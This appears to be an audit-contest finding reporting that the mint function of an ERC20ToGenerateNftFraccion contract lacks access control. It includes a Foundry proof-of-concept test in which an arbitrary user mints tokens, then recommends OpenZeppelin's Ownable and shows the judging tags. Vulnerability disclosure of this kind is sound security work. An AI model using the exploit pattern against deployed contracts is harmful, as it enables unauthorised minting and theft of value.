Submission Details
Severity:
`ERC20ToGenerateNftFraccion::mint` function has no admin protection, allowing anyone to be able to mint tokens
Description
The ERC20ToGenerateNftFraccion::mint doesn't have any admin or onlyOwner protection.
Impact
This issue allows anyone to be able to mint any desired amount of tokens.
Proof of Concepts
Add the following test to TokenDividerTest.t.sol:
function testERC20MintFunctionHasNoAdminProtection() public {
vm.startPrank(USER);
erc721Mock.approve(address(tokenDivider), TOKEN_ID);
tokenDivider.divideNft(address(erc721Mock), TOKEN_ID, AMOUNT);
vm.stopPrank();
ERC20Mock erc20Mock = ERC20Mock(tokenDivider.getErc20InfoFromNft(address(erc721Mock)).erc20Address);
// A random user is able to mint the erc20Mock tokens
vm.startPrank(USER2);
erc20Mock.mint(USER2, AMOUNT);
vm.stopPrank();
assertEq(erc20Mock.balanceOf(USER), erc20Mock.balanceOf(USER2));
}
Tools Used
Foundry, Manual analysis
Recommended mitigation
Import the Ownable contract from OpenZeppelin or add an onlyOwner modifier.
Updates
Lead Judging Commences
fishy 8 months ago
Submission Judgement Published Assigned finding tags:
Lack of token access control chekcs
Any person can mint the ERC20 token generated in representation of the NFT
Rewards breakdown
nSLOC
181This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.